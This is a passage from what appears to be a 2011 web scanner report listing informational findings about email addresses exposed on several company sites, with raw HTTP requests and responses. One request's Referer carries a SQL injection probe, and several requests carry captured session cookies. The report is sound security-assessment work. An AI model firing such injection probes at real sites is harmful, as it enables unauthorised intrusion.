<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BridgeFront | E-Lear
...[SNIP]...
<a href="mailto:info@bridgefront.com">info@bridgefront.com</a>
...[SNIP]...
<a href="mailto:info@bridgefront.com">
...[SNIP]...

24.35. http://www.bridgefront.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /cart/

Issue detail

The following email address was disclosed in the response:

Request

GET /cart/ HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: osCsid=sggkjb8k1c1rugrrvf2g0d37e3; path=/cart/; domain=bridgefront.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25447

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>BridgeFront - Shopping
...[SNIP]...
<a href="mailto:info@bridgefront.com">
...[SNIP]...
<u>info@bridgefront.com</u>
...[SNIP]...

24.36. http://www.bridgefront.com/contactus.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /contactus.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contactus.php HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
Referer: http://www.bridgefront.com/cart/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BridgeFront - Contac
...[SNIP]...
<a href="mailto:sales@bridgefront.com">sales@bridgefront.com</a>
...[SNIP]...
<a href="mailto:marketing@bridgefront.com">marketing@bridgefront.com</a>
...[SNIP]...
<a href="mailto:pr@bridgefront.com">pr@bridgefront.com</a>
...[SNIP]...
<a href="mailto:support@bridgefront.com">support@bridgefront.com</a>
...[SNIP]...
<a href="mailto:webmaster@bridgefront.com">webmaster@bridgefront.com</a>
...[SNIP]...
<a href="mailto:info@bridgefront.com">
...[SNIP]...

24.37. http://www.bridgefront.com/solutions_education_revenue.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /solutions_education_revenue.php

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions_education_revenue.php HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
Referer: http://www.bridgefront.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1; __utmc=199010044; __utmb=199010044.3.10.1303780600

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:30:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Medical Billing | R
...[SNIP]...
<a href="mailto:info@bridgefront.com">info@bridgefront.com</a>
...[SNIP]...

24.38. http://www.bridgefront.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.bridgefront.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.8
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:15:43 GMT
Connection: close
Content-Length: 11289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BridgeFront - Com
...[SNIP]...
<a href="mailto:webmaster@bridgefront.com">webmaster@bridgefront.com</a>
...[SNIP]...
<a href="mailto:info@bridgefront.com">
...[SNIP]...

24.39. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js?1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:56:20 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 06:53:13 GMT
ETag: "20002e-3825-4783b1d128840"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 14373

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext:
...[SNIP]...

24.40. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js?1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:56:21 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 06:53:13 GMT
ETag: "200033-6c30-4783b1d128840"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 27696

/*
* JQZoom Evolution 1.0.1 - Javascript Image magnifier
*
* Copyright (c) Engineer Renzi Marco(www.mind-projects.it)
*
* $Date: 12-12-2008
*
*    ChangeLog:
*
* $License : GPL,so any change to the code you should copy and paste this section,and would be nice to report this to me(renzi.mrc@gmail.com).
*/
(function($)
{
$.fn.jqzoom = function(options)
{
var settings = {
zoomType: 'standard', //standard/reverse/innerzoom
zoomWidth: 200,        //zoomed wid
...[SNIP]...

24.41. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<script type="text/javascript">
                   lang.LoginEnterValidEmail = "Please type in a valid email address, such as joe@aol.com";
                   lang.LoginEnterPassword = "Please type in your password.";
                   lang.AccountEnterPassword = "Please type in a password.";
                   lang.AccountPasswordsDontMatch = "Your passwords don't match.";
       
...[SNIP]...

24.42. http://www.comodo.com/contact-comodo/contact-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /contact-comodo/contact-us.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-comodo/contact-us.php HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); ap=; referrerURL=; entryURL=http%3A//www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg; wooTracker=ZQXK7Q954RCS6ZFI1HH4JS1QZ5D1UD01; sifrFetch=true; currency=USD; region=North%20America; country=US; __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.6.10.1303775073

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:51:50 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 54537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:enterprisesolutions@comodo.com" title="Contact Us" onclick="javascript: pageTracker._trackPageview('/click-track/EMAIL/EnterpriseSol/?pagelink=contact-us.php');">EnterpriseSolutions@comodo.com</a>
...[SNIP]...
<a href="mailto:sales@comodo.com" title="Contact Us" onclick="javascript: pageTracker._trackPageview('/click-track/EMAIL/Sales/?pagelink=contact-us.php');">sales@comodo.com</a>
...[SNIP]...
<a href="mailto:sales@comodo.com" title="Contact Us" onclick="javascript: pageTracker._trackPageview('/click-track/EMAIL/Sales/?pagelink=contact-us.php');">sales@comodo.com</a>
...[SNIP]...
<a href="mailto:sales@comodojapan.com" title="Contact Us" onclick="javascript: pageTracker._trackPageview('/click-track/EMAIL/JapanSales/?pagelink=contact-us.php');">sales@comodojapan.com</a>
...[SNIP]...
<a href="mailto:sales@comodoisrael.com" title="Contact Us" onclick="javascript: pageTracker._trackPageview('/click-track/EMAIL/ComodoIsrael/?pagelink=contact-us.php');">sales@comodoISRAEL.com</a>
...[SNIP]...
<a href="mailto:sales@comodo.com" title="Contact Us" onclick="javascript: pageTracker._trackPageview('/click-track/EMAIL/Sales/?pagelink=contact-us.php');">sales@comodo.com</a>
...[SNIP]...

24.43. http://www.comodo.com/js/lib/jquery.dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /js/lib/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/lib/jquery.dimensions.js HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
Referer: http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:44:18 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jul 2009 14:28:06 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Wed, 27 Apr 2011 23:44:18 GMT
Cache-Control: max-age=172800
Content-Length: 3442

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

24.44. http://www.comodo.com/js/lib/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /js/lib/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/lib/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
Referer: http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=44439b28ed50f35415dffbf574898661; __utmz=1.1303775073.1.1.utmgclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.840845901.1303775073.1303775073.1303775073.1; __utmc=1; __utmb=1.2.10.1303775073

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:44:23 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 20 May 2010 16:02:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Wed, 27 Apr 2011 23:44:23 GMT
Cache-Control: max-age=172800
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.45. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/about-first-data/media/press-releases/04_11_11

Issue detail

The following email address was disclosed in the response:

Request

GET /en_us/about-first-data/media/press-releases/04_11_11 HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:14:09 GMT; Path=/
Via: 1.1 firstdata.com
Content-Length: 33202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>First
...[SNIP]...
<a href="mailto:elizabeth.grice@firstdata.com">elizabeth.grice@firstdata.com</a>
...[SNIP]...

24.46. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /en_us/about-first-data/media/press-releases/04_12_11

Issue detail

The following email address was disclosed in the response:

Request

GET /en_us/about-first-data/media/press-releases/04_12_11 HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: countryCode=en_us; Expires=Sun, 14-May-2079 03:14:09 GMT; Path=/
Via: 1.1 firstdata.com
Content-Length: 32907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>First
...[SNIP]...
<a href="mailto:elizabeth.grice@firstdata.com">elizabeth.grice@firstdata.com</a>
...[SNIP]...

24.47. http://www.firstdata.com/fdc_site/_scripts/lib/jquery.xml2json.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /fdc_site/_scripts/lib/jquery.xml2json.pack.js

Issue detail

The following email address was disclosed in the response:

Request

GET /fdc_site/_scripts/lib/jquery.xml2json.pack.js HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:17 GMT
Server: Apache/2.2.14
Last-Modified: Thu, 07 Jan 2010 00:45:57 GMT
ETag: "dd68-8d1-47c8864e57b40"
Accept-Ranges: bytes
Content-Length: 2257
Content-Type: application/javascript

/*
### jQuery XML to JSON Plugin v1.0 - 2008-07-01 ###
* http://www.fyneworks.com/ - diego@fyneworks.com
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
###
Website: http://www.fyneworks.com/jquery/x
...[SNIP]...

24.48. http://www.firstdata.com/fdc_site/_styles/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstdata.com
Path:   /fdc_site/_styles/screen.css

Issue detail

The following email address was disclosed in the response:

Request

GET /fdc_site/_styles/screen.css HTTP/1.1
Host: www.firstdata.com
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:10 GMT
Server: Apache/2.2.14
Last-Modified: Tue, 01 Jun 2010 22:55:25 GMT
ETag: "cb78-8d1-487ffde6df140"
Accept-Ranges: bytes
Content-Length: 2257
Content-Type: text/css

/*
Title:        screen.css
Author:    Fred. : fboursier@vsapartners.com
--
Notes:
   = Controlling stylesheet for screen rendering; imports other sheets;
       defines rules for the highest-level layout containers
*/
@import url("/fdc_site/_styles/lib/baseline.css");
@import ur
...[SNIP]...

24.49. https://www.fs.ustrust.com/CLUIResources/scripts/UIControls.CLUICommon.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /CLUIResources/scripts/UIControls.CLUICommon.js

Issue detail

The following email address was disclosed in the response:

Request

GET /CLUIResources/scripts/UIControls.CLUICommon.js HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
Referer: https://www.fs.ustrust.com/login/login.aspx?sgt=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Bear=yPl+/7B1/5bMEMabWxvfBUcVLIn4OqeptQYsxG7yfM0=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: https://www.fs.ustrust.com/CLUIResources/scripts/UIControls.CLUICommon.js
Last-Modified: Thu, 03 Mar 2011 01:23:20 GMT
Accept-Ranges: bytes
ETag: "0f4a29441d9cb1:24f3"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:27:16 GMT
Content-Length: 22541

function trimAll(A){while(A.substring(0,1)==" "){A=A.substring(1,A.length);}while(A.substring(A.length-1,A.length)==" "){A=A.substring(0,A.length-1);
}return A;}var ShowErrorSummary=function(){var A=
...[SNIP]...
ave provided is not complete or contains invalid characters which prevent your message from being processed. Please check to ensure that the address you have provided is in the proper format (example: jdoe@domain.com).";
var errEmailMissing="Please enter your e-mail address in both the Enter and Confirm fields.";
var errEmailMismatch="E-mail addresses in the Enter and Confirm fields must match.";
var errorMessa
...[SNIP]...

24.50. https://www.fs.ustrust.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /login/login.aspx?sgt=1 HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 3D2F794B
Set-Cookie: Bear=HdC5r0QnFpMuvDTYknZMKN4FD4TbXTCUXG9mmgSSpfc=; domain=.fs.ustrust.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 79822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...
<a title="This link will launch an email message in the default email provider" href="mailto:wealthmanagement@bankofamerica.com?body=Please note: E-mail sent using this feature is not encrypted or secured by Bank of America. Do not send any account, trade or other related confidential information on this system.">
...[SNIP]...

24.51. http://www.hipaarx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipaarx.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.hipaarx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
